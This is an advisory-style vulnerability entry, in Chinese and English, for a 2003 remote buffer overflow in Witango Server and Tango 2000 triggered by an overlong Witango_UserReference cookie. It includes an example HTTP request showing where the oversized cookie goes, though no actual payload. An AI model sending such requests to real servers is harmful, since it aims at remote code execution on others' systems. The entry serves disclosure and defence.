https://www.exploit-db.com/exploits/22926
https://www.securityfocus.com/bid/82776
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-130

WiTangoApplicationServer和Tango2000版本存在缓冲区溢出漏洞。远程攻击者可以借助到Witango_UserReference的超长cookie执行任意代码。

source: http://www.securityfocus.com/bid/8224/info

Witango Server is prone to a remote buffer overflow vulnerability. Remote users may be able to send an HTTP request to a Witango server with a cookie containing a specific variable set to an excessively large value. Remote code execution is possible.

GET /ngssoftware.tml HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, */*
Accept-Language: en-gb
User-Agent: My Browser
Host: ngssoftware.com
Connection: Keep-Alive
Cookie: Witango_UserReference= parameter length 2864

Witango Witango Server 5.0.1.061

Witango Tango Server 2000

来源:VULNWATCH
名称:20030718Witango&Tango2000ApplicationServerRemoteSystemBufferOverrun;
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0038.html